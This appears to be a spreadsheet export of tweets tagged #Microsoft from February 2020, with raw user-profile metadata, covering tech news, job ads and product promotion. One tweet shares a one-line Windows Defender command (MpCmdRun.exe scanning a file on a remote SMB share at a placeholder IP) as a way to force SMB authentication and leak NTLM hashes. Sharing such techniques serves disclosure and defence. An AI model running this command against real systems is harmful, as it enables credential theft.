    <t>{'id': 134780528, 'id_str': '134780528', 'name': 'PSU Technology Group', 'screen_name': 'PSUTechnology', 'location': 'Cheltenham, UK', 'description': 'PSU Technology Group - Managed IT Services, Cloud &amp; Hosting, Connectivity, Unified Communications and Phone Maintenance Solutions for Businesses Across the UK.', 'url': 'https://t.co/T8gVLiWVNP', 'entities': {'url': {'urls': [{'url': 'https://t.co/T8gVLiWVNP', 'expanded_url': 'https://psu.co.uk', 'display_url': 'psu.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 836, 'friends_count': 1175, 'listed_count': 18, 'created_at': 'Mon Apr 19 12:28:50 +0000 2010', 'favourites_count': 315, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1742, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '262626', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme7/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme7/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/482535268172312577/RoWs40Zs_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/482535268172312577/RoWs40Zs_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/134780528/1493388545', 'profile_link_color': 'CE381E', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': 'F3F3F3', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Feb 27 15:03:20 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft further details the enhanced machine learning capabilities in SQL Server 2019 #sqlserver2019 #microsoft: https://t.co/0cxWP6mXUj</t>
  </si>
  <si>
    <t>{'id': 157010330, 'id_str': '157010330', 'name': 'InfoStrat', 'screen_name': 'InfoStrat', 'location': 'Washington, D.C.', 'description': 'Microsoft Gold Partner delivering Dynamics, Power Apps, SharePoint, web development, ClickDimensions, Scribe, Adobe and Sitecore', 'url': 'http://t.co/QZ7kGoRrSA', 'entities': {'url': {'urls': [{'url': 'http://t.co/QZ7kGoRrSA', 'expanded_url': 'http://www.infostrat.com', 'display_url': 'infostrat.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 663, 'friends_count': 617, 'listed_count': 29, 'created_at': 'Fri Jun 18 15:45:20 +0000 2010', 'favourites_count': 158, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 16741,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'http://pbs.twimg.com/profile_images/1042092934236196867/htGXmGw__normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1042092934236196867/htGXmGw__normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/157010330/1579097134',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</si>
  <si>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15:03:00 +0000 2020</t>
  </si>
  <si>
    <t>OTOMEDIUS EXCELLENT
Konami - Xbox 360
List price: US$ 11.79
Special price: US$ 9.99*
You save: US$ 1.80 (15%)
#playasia #affiliate #OTOMEDIUS  #weeklyspecial #sale #xbox360 #microsoft 
https://t.co/mbxhYWQICf https://t.co/G00JiCBF7F</t>
  </si>
  <si>
    <t>Thu Feb 27 15:01:26 +0000 2020</t>
  </si>
  <si>
    <t>appleinsider: As uncertainty swirls about the coronavirus impact technology industry-wide, industry stalwart #Microsoft has issued an earnings warning, and $aapl continues to plummet. https://t.co/UvoRKQ3rFm https://t.co/A57JdklYe5</t>
  </si>
  <si>
    <t>{'id': 20930398, 'id_str': '20930398', 'name': 'Jay-Z', 'screen_name': 'z4mp1', 'location': 'Liverpool, NY', 'description': 'Husband, parent, computer consultant. Love mountainbiking, hunting, fishing, the Yankees, SU lacrosse &amp; hoops, GEOcaching and surfing the NET', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1053, 'friends_count': 2084, 'listed_count': 168, 'created_at': 'Sun Feb 15 19:27:16 +0000 2009', 'favourites_count': 1855, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 140719,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'http://pbs.twimg.com/profile_images/1185180100075180032/zjdRTaaG_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1185180100075180032/zjdRTaaG_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/20930398/1351558197', 'profile_link_color': '999999',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</si>
  <si>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15:01:22 +0000 2020</t>
  </si>
  <si>
    <t>Change Case: Quickly change make your text upper case by highlighting and press Shift+F3.  Keep pressing to cycle between UPPER, lower, Sentence and Title Case. #Microsoft #Word</t>
  </si>
  <si>
    <t>Thu Feb 27 15:01:04 +0000 2020</t>
  </si>
  <si>
    <t>Admins beware! #Microsoft gives heads-up for 'disruptive' changes to authentication in #Office365 email service https://t.co/9y4juV31GP https://t.co/lep01UeB71</t>
  </si>
  <si>
    <t>Thu Feb 27 15:00:47 +0000 2020</t>
  </si>
  <si>
    <t>Are you an IT Manager in the Philly area: managing large scale IT Infrastructure (server storage backup Microsoft Linux)?
See new opportunity https://t.co/zz4SxLlcnI
#jobsoftheweek #thetrevigroup #itmanager #phillyjobs #linuxserver #microsoft #backupsolutions #storagesystems</t>
  </si>
  <si>
    <t>Thu Feb 27 15:00:07 +0000 2020</t>
  </si>
  <si>
    <t>Teaching 100 teachers: What this teenager is doing with Minecraft is mind-blowing #Microsoft https://t.co/lzKrcQhm1L</t>
  </si>
  <si>
    <t>Thu Feb 27 15:00:01 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft says Covid-19 health emergency will affect its Q3 financials: "We do not expect to meet More Personal Computing segment guidance as Windows OEM and Surface are more negatively impacted than previously anticipated. https://t.co/eV4eAw6i8Z #Microsoft #COVID19 https://t.co/vmMaMUai1x</t>
  </si>
  <si>
    <t>Thu Feb 27 14:59:32 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "Norton LifeLock Phishing Scam Installs Remote Access Trojan:" https://t.co/VwfLYqLvNQ
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Thu Feb 27 14:59:31 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "SQL Dump from BGR India Shared on Hacker Forum:" https://t.co/YLwbss2jeQ
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Thu Feb 27 14:59:30 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "Google Takes Aim at Microsoft Edge With Flurry of Ads:" https://t.co/q4yVkmoAZH
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Thu Feb 27 14:58:42 +0000 2020</t>
  </si>
  <si>
    <t>Thu Feb 27 14:56:17 +0000 2020</t>
  </si>
  <si>
    <t>Cyber Attacks now happen to 1 in 4 companies with the right software in place, having unprotected software will only increase this chance. #CyberSecurity #W7 #Windows7 #BusinessSoftware #Microsoft https://t.co/AZT9S85iCW https://t.co/tXaaStrTMV</t>
  </si>
  <si>
    <t>Thu Feb 27 14:56:05 +0000 2020</t>
  </si>
  <si>
    <t>What's the difference between @Azure and @awscloud? Is it time for your business to adopt a cloud platform? Find out in @BrainSell blog "Unraveling the Tech: Microsoft Azure"
#Microsoft #Azure #MicrosoftAzure #AWS #BusinessTech #Cloud #Software #Server
https://t.co/xyiGLwyKRN</t>
  </si>
  <si>
    <t>{'id': 3236903698, 'id_str': '3236903698', 'name': 'Kellie Pitt', 'screen_name': 'KpittPitt', 'location': 'Massachusetts, USA', 'description': 'Brainsell ERP Overlord', 'url': 'https://t.co/P1M3WPWxdh', 'entities': {'url': {'urls': [{'url': 'https://t.co/P1M3WPWxdh', 'expanded_url': 'http://www.brainsell.net', 'display_url': 'brainsell.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 89, 'friends_count': 196, 'listed_count': 2, 'created_at': 'Tue May 05 20:39:45 +0000 2015', 'favourites_count': 130, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 723,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'http://pbs.twimg.com/profile_images/1006191421357883393/E7Nfs52k_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1006191421357883393/E7Nfs52k_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3236903698/1518185897',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</si>
  <si>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14:52:08 +0000 2020</t>
  </si>
  <si>
    <t>Dynamics 365 Business Central 2020 Release Wave 1 enhancements and updates video. Click the link and check out part 1 of 2 ... Part 2 to follow shortly. 
Any questions let me know!! 
#Microsoft #Dynamics365 #MicrosoftPartnerNetwork #Azure #Office365
https://t.co/CWG25aW7KD</t>
  </si>
  <si>
    <t>Thu Feb 27 14:50:08 +0000 2020</t>
  </si>
  <si>
    <t>Thu Feb 27 14:49:54 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft has released its new unified Office app for iOS and Android, which combines Word, Excel, and PowerPoint into one application
The software maker first tested this new Office app in November, and now, anyone can download and install it
#microsoft #office #app https://t.co/uQ1wDHhRUW</t>
  </si>
  <si>
    <t>{'id': 2602253442, 'id_str': '2602253442', 'name': 'Hunter Bond Recruitment', 'screen_name': 'Hunterbondjobs', 'location': 'London and New York.', 'description': 'Global Recruitment Firm | Finance, Technology &amp; Change | Europe, North America &amp; Asia', 'url': 'https://t.co/sYubsBqLYz', 'entities': {'url': {'urls': [{'url': 'https://t.co/sYubsBqLYz', 'expanded_url': 'https://hunterbond.com/jobs', 'display_url': 'hunterbond.com/jobs', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 269, 'friends_count': 1025, 'listed_count': 21, 'created_at': 'Thu Jul 03 21:23:04 +0000 2014', 'favourites_count': 49, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3297,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'http://pbs.twimg.com/profile_images/1212726461414727682/F0aJIgPk_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1212726461414727682/F0aJIgPk_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2602253442/1577971457', 'profile_link_color': '02222E',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</si>
  <si>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14:47:06 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft cant make HoloLens 2 headsets fast enough
https://t.co/5xvUYlkl5X
#XR #VR #AR #hololens2 #headsets #technology #microsoft #ai #machinelearning #artificialintelligence #cybersecurity https://t.co/58sP7U2GTf</t>
  </si>
  <si>
    <t>{'id': 740641170813034496, 'id_str': '740641170813034496', 'name': 'Link To VR', 'screen_name': 'linktovr', 'location': '', 'description': 'Link To VR is a Virtual &amp; Augmented Reality business solutions company. We help organizations implement growth-based solutions using the VR/AR platform.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 117, 'friends_count': 77, 'listed_count': 16, 'created_at': 'Wed Jun 08 20:26:30 +0000 2016', 'favourites_count': 300, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 339, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1204137850058498048/ZbC6M41l_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1204137850058498048/ZbC6M41l_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/740641170813034496/1575923039',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</si>
  <si>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14:45:17 +0000 2020</t>
  </si>
  <si>
    <t>The world of #Microsoft is continuously changing, and its crucial for your organization to stay in the know.
Subscribe to our Monthly Buzz Newsletter and never miss an important update: https://t.co/f71pkZALbE https://t.co/rLH3aoHQpC</t>
  </si>
  <si>
    <t>Thu Feb 27 14:45:02 +0000 2020</t>
  </si>
  <si>
    <t>You want to deploy App Service in a highly available VM infrastructure on Azure Stack Hub? Use this: https://t.co/WIiMIh9z0H #microsoft #azurestackhub #appservice https://t.co/DhughiAGKf</t>
  </si>
  <si>
    <t>Thu Feb 27 14:42:16 +0000 2020</t>
  </si>
  <si>
    <t>As uncertainty swirls about the coronavirus impact technology industry-wide, industry stalwart #Microsoft has issued an earnings warning, and $aapl continues to plummet. https://t.co/YQ8XoJ16DZ https://t.co/7S88dzTqEv</t>
  </si>
  <si>
    <t>{'id': 2382497270, 'id_str': '2382497270', 'name': 'primo4k \uf8ff', 'screen_name': 'primo4k', 'location': 'Nayarit, California. ', 'description': 'Si yo te critico.. Ah eso le llamo Critica Constructiva.. Asi q no te molestes xfavor.', 'url': 'https://t.co/OPud5Dv1YN', 'entities': {'url': {'urls': [{'url': 'https://t.co/OPud5Dv1YN', 'expanded_url': 'https://www.youtube.com/c/primo4k?gvnc=1', 'display_url': 'youtube.com/c/primo4k?gvncâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 5097, 'friends_count': 445, 'listed_count': 144, 'created_at': 'Mon Mar 10 18:12:40 +0000 2014', 'favourites_count': 913, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 56745,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'http://pbs.twimg.com/profile_images/976235257329418240/J-_59YrP_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/976235257329418240/J-_59YrP_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2382497270/1436583024',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</si>
  <si>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14:41:08 +0000 2020</t>
  </si>
  <si>
    <t>#Oracle and #Microsoft have added to their #cloud interconnect strategy with the addition of a high-speed, private connection between Oracle Cloud Infrastructure and #Azure in the #EU. https://t.co/SRgytaLHJP https://t.co/HTQkZHMOjm</t>
  </si>
  <si>
    <t>{'id': 1100340964596609024, 'id_str': '1100340964596609024', 'name': 'Centric Data', 'screen_name': 'CentricData1', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 6, 'friends_count': 23, 'listed_count': 0, 'created_at': 'Tue Feb 26 10:25:04 +0000 2019', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 250, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1100341469553016832/JhFIdz42_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1100341469553016832/JhFIdz42_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1100340964596609024/1551178174',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</si>
  <si>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14:40:52 +0000 2020</t>
  </si>
  <si>
    <t>Tomorrow i will be at the AI demo booth at the Microsoft Showcase between 11u30 and 15u answering all your business and #dev questions regarding #mixedreality, #hololens2 and #microsoft #AI. If you want you can try out an actual #hololens2 device. #MSIgniteTheTour https://t.co/sxuin8DD58</t>
  </si>
  <si>
    <t>Thu Feb 27 14:39:13 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft came out yesterday and stated it does not expect to meet prior guidance for its PC segment, due to supply chain disruptions related to the coronavirus.  
$MSFT said the unit is expected to generate revenue lower than the previous forecast of $10.75B to $11.15B</t>
  </si>
  <si>
    <t>{'id': 115921777, 'id_str': '115921777', 'name': 'BravoTrader', 'screen_name': 'BravoTrader', 'location': '', 'description': 'Engineer. \nStock Trader. \nMath and Tech fan. \nMinimalist.\nBlog.', 'url': 'https://t.co/scIY1sWQcI', 'entities': {'url': {'urls': [{'url': 'https://t.co/scIY1sWQcI', 'expanded_url': 'https://www.xGreedAndFear.com/', 'display_url': 'xGreedAndFear.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 151, 'friends_count': 30, 'listed_count': 8, 'created_at': 'Sat Feb 20 13:03:50 +0000 2010', 'favourites_count': 13, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1953,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'http://pbs.twimg.com/profile_images/1218376842006204417/ZZ2pR9rL_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1218376842006204417/ZZ2pR9rL_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/115921777/1577753838', 'profile_link_color': '17923B',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</si>
  <si>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14:38:44 +0000 2020</t>
  </si>
  <si>
    <t>Outgrowing QuickBooks Online? 4 Reasons to Change! - Gravity Software https://t.co/98SwtepA7S by @vsilvani
#Microsoft #CRM #QuickBooksEnterprise #Cloud #Accounting #Inventory #Purchasing #MultiSite #Financials #OutsourcedCFOs #ERP #CFOs #Accountants #Bookkeepers #ProAdvisor https://t.co/A2VniEZvG0</t>
  </si>
  <si>
    <t>Thu Feb 27 14:35:45 +0000 2020</t>
  </si>
  <si>
    <t>Excited to report the progress of our Hibret Elementary elementary school library and innovation center building project. Its my elementary school and the largest school in #Gonder. 
Thank you to my collogues at #Microsoft and project partners @OpenHeartsBigD1 and @linkethiopia https://t.co/Ftf7ENeYsC</t>
  </si>
  <si>
    <t>{'id': 57463078, 'id_str': '57463078', 'name': 'Mekonnen Kassa', 'screen_name': 'raskassa', 'location': 'Seattle, WA', 'description': 'A community and political activist focusing on Africa. \nICT professional..', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2547, 'friends_count': 534, 'listed_count': 12, 'created_at': 'Thu Jul 16 22:13:12 +0000 2009', 'favourites_count': 3973, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5928,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'http://pbs.twimg.com/profile_images/1026280849803603969/74DIgrD6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1026280849803603969/74DIgrD6_normal.jpg',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</si>
  <si>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14:35:02 +0000 2020</t>
  </si>
  <si>
    <t>The Top 3 Security Certifications That Will Boost Your IT Career
Are you considering a career in IT security? These are the top three certifications that can help you on that path!
Read more here https://t.co/E1F2rz18FP
#SecurityCertifications #ITCareer #Microsoft https://t.co/DCkg58LUNK</t>
  </si>
  <si>
    <t>Thu Feb 27 14:34:28 +0000 2020</t>
  </si>
  <si>
    <t>Is Morale Among #Microsoft's #Mixer Team Is At An All-Time Low?!
This &amp;amp; much more on today's serving of #TheScoop
AVAILABLE NOW:
YouTube: https://t.co/En3XdWbXTS
Spotify: https://t.co/z5uTzD3Sgb
Twitch: https://t.co/2q1qskKYTJ
Soundcloud: https://t.co/pG94jkpGk1
#Podcast https://t.co/znwdwhQC6T</t>
  </si>
  <si>
    <t>{'id': 930103023887683584, 'id_str': '930103023887683584', 'name': 'Ice Cream Uploads', 'screen_name': 'IceCreamUploads', 'location': 'United Kingdom', 'description': '@Twitch Partnered. The UKâ€™s *coolest* gaming channel! Powered @GTOmegaRacing &amp; @CORSAIR. Contact us: IceCream@Jellymedia.com', 'url': 'https://t.co/R4P6RsONvg', 'entities': {'url': {'urls': [{'url': 'https://t.co/R4P6RsONvg', 'expanded_url': 'http://www.icecreamuploads.com', 'display_url': 'icecreamuploads.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2134, 'friends_count': 497, 'listed_count': 1, 'created_at': 'Mon Nov 13 16:00:16 +0000 2017', 'favourites_count': 1911, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3858,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'http://pbs.twimg.com/profile_images/1212683937090359297/ZK9nxOz__normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1212683937090359297/ZK9nxOz__normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/930103023887683584/1577961331', 'profile_link_color': 'E8148B',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</si>
  <si>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14:33:50 +0000 2020</t>
  </si>
  <si>
    <t>Yeah Stu can get back into #Microsoft #Varney</t>
  </si>
  <si>
    <t>{'id': 1226366660384157698, 'id_str': '1226366660384157698', 'name': 'Aimet Bott', 'screen_name': 'AimetBott', 'location': 'Behind enemy lines', 'description': 'Remember when the Congress actually had adults in it?', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 6, 'friends_count': 183, 'listed_count': 0, 'created_at': 'Sun Feb 09 04:46:28 +0000 2020', 'favourites_count': 38, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1039, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1227719948857831425/RgCm-u9-_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1227719948857831425/RgCm-u9-_normal.jpg',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</si>
  <si>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14:31:59 +0000 2020</t>
  </si>
  <si>
    <t>Want to create impactful business #reports? Stop striving, start creating with this simple guide https://t.co/AFLirvC5a0.
#PowerBI #BI #Tech #ThursdayThoughts #Microsoft #data</t>
  </si>
  <si>
    <t>Microsoft To Open Azure Cloud Data Center Region In Spain https://t.co/mgFLiWRxaT by @crn #Cloud #Tech #Azure #Microsoft #Spain</t>
  </si>
  <si>
    <t>Thu Feb 27 14:30:16 +0000 2020</t>
  </si>
  <si>
    <t>It's never to late to start learning a new skill, hobby, or boost your career skills. We offer a wide variety of training courses that can help you do just that! #Thursdaythoughts #Adobe #Autodesk #Microsoft #TechnicalAuthoring 
https://t.co/TNb0CCFtsj https://t.co/QTUh6Nw1PW</t>
  </si>
  <si>
    <t>{'id': 448903066, 'id_str': '448903066', 'name': 'Armada training', 'screen_name': 'armadatraining', 'location': 'Birmingham, Bristol, Milton Keynes, Reading, Sheffield', 'description': 'Provider of first-class technical training courses. Accredited by Autodesk, Adobe and ISTC.', 'url': 'https://t.co/NueOydGk2b', 'entities': {'url': {'urls': [{'url': 'https://t.co/NueOydGk2b', 'expanded_url': 'http://www.armada.co.uk', 'display_url': 'armada.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2559, 'friends_count': 2294, 'listed_count': 45, 'created_at': 'Wed Dec 28 14:15:11 +0000 2011', 'favourites_count': 244, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3147, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '4E8AF1', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/920673988304605186/KaJD1sZJ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/920673988304605186/KaJD1sZJ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/448903066/1536665740', 'profile_link_color': '1B95E0', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'B9DFF2', 'profile_text_color': '59BFDE', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Feb 27 14:26:40 +0000 2020</t>
  </si>
  <si>
    <t>#covid19 More #financialimpacts. The #stockmarket carnage in the #techindustry shows it isn't immune to deepening fears about the spread of #coronavirus. #Apple, #Facebook, #Google, #Microsoft &amp;amp; #Amazon lost more than $238 billion...https://t.co/SodEe56Vbl https://t.co/coGY8lZjiu</t>
  </si>
  <si>
    <t>{'id': 5398862, 'id_str': '5398862', 'name': 'Regina Phelps', 'screen_name': 'ReginaPhelps', 'location': 'San Francisco, CA', 'description': 'Crisis Management, Exercise Design &amp; Pandemic Planning Expert since 1982 - Industry thought leader', 'url': 'https://t.co/6FxyVG8wjM', 'entities': {'url': {'urls': [{'url': 'https://t.co/6FxyVG8wjM', 'expanded_url': 'http://www.ems-solutionsinc.com', 'display_url': 'ems-solutionsinc.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1003, 'friends_count': 947, 'listed_count': 56, 'created_at': 'Sun Apr 22 12:21:40 +0000 2007', 'favourites_count': 2677, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3209,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'http://pbs.twimg.com/profile_images/755878175893102592/dSwT2Fll_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/755878175893102592/dSwT2Fll_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/5398862/1580507159', 'profile_link_color': '91D2FA',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</si>
  <si>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Thu Feb 27 14:25:00 +0000 2020</t>
  </si>
  <si>
    <t>2 Great Guys are discussing why #HPE #Microsoft &amp;amp; #RedHat are Better Together with #SQLServer #Openshift &amp;amp; #SuperdomeFlex : interesting!
@RedHatPartners @BobWardms @Buckwoodymsft @RedHat @SQLServer #HPEMSFT #HPERedHat #Social4UTV @mssqltiger #Linux @SQLGoddess @venzann https://t.co/GzZrkBBuLr</t>
  </si>
  <si>
    <t>Thu Feb 27 14:21:35 +0000 2020</t>
  </si>
  <si>
    <t>Is Microsoft Power Apps right for your organisation? Let us breakdown ten of the most commonly asked questions about #PowerApps Apps from our users
https://t.co/AmGQwmAVog
#PowerPlatform #digitalworkplace #digitaltransformation #Microsoft https://t.co/fndaNH5rTD</t>
  </si>
  <si>
    <t>{'id': 1109107550912475139, 'id_str': '1109107550912475139', 'name': 'Pi Digital Solutions', 'screen_name': 'PiDigital1', 'location': 'London, England', 'description': 'Pi Digital Solutions is a business-to-business digital transformation agency that specialises in tailoring  effective, bespoke solutions to business challenges.', 'url': 'https://t.co/JJ6sp8IEzh', 'entities': {'url': {'urls': [{'url': 'https://t.co/JJ6sp8IEzh', 'expanded_url': 'https://pidigitalsolutions.com/', 'display_url': 'pidigitalsolutions.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 36, 'friends_count': 267, 'listed_count': 0, 'created_at': 'Fri Mar 22 15:00:21 +0000 2019', 'favourites_count': 22, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1109424219933339648/Wk_PzfOA_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1109424219933339648/Wk_PzfOA_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1109107550912475139/1553342872',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</si>
  <si>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14:21:34 +0000 2020</t>
  </si>
  <si>
    <t>A new way to exfiltrate #NTLM hash by forcing #SMB auth ? 
Check this #Microsoft #WindowsDefender
MpCmdRun.exe -Scan  -ScanType 3 -File \\xx[.]xx[.]xx[.]xx\Lux\Filename.txt
https://t.co/2L6kkAyqSM</t>
  </si>
  <si>
    <t>{'id': 1255364346, 'id_str': '1255364346', 'name': 'Hai vaknin', 'screen_name': 'VakninHai', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2, 'friends_count': 82, 'listed_count': 0, 'created_at': 'Sat Mar 09 21:06:48 +0000 2013', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 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</si>
  <si>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Feb 27 14:21:10 +0000 2020</t>
  </si>
  <si>
    <t>Some of the biggest tech companies, including #Apple, #Google, #Facebook, #Microsoft and #Twitter, are publicly backing the Data Transfer Project, launched in 2018, to help create an open-source, data portability platform.
https://t.co/N2R4r84FKb #myData #gdpr #privacy</t>
  </si>
  <si>
    <t>{'id': 68208592, 'id_str': '68208592', 'name': 'Daniel Bayley', 'screen_name': 'DanielBayley80', 'location': 'Oxfordshire, UK', 'description': 'Information #Technology, programming, #health, fitness and #photography enthusiast - All views my own. Offence is your choice. Without prejudice.', 'url': 'http://t.co/gbH5fXZsZ9', 'entities': {'url': {'urls': [{'url': 'http://t.co/gbH5fXZsZ9', 'expanded_url': 'http://danielbayley.uk', 'display_url': 'danielbayley.uk', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 971, 'friends_count': 340, 'listed_count': 99, 'created_at': 'Sun Aug 23 18:53:06 +0000 2009', 'favourites_count': 4744, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 17892,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'http://pbs.twimg.com/profile_images/778963510793498624/7xm62mOm_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/778963510793498624/7xm62mOm_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/68208592/1480855241', 'profile_link_color': '035F80',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</si>
  <si>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14:20:05 +0000 2020</t>
  </si>
  <si>
    <t>Inside Microsofts plan to fix Americas broken #voting system
Microsoft #ElectionGuard is an attempt to make voting in the United States more modern and equitable. And pilot trials will begin next year.
#Microsoft #election #election2020 #tech #infosec
https://t.co/ZYspf4rHL7 https://t.co/7rftZRH08O</t>
  </si>
  <si>
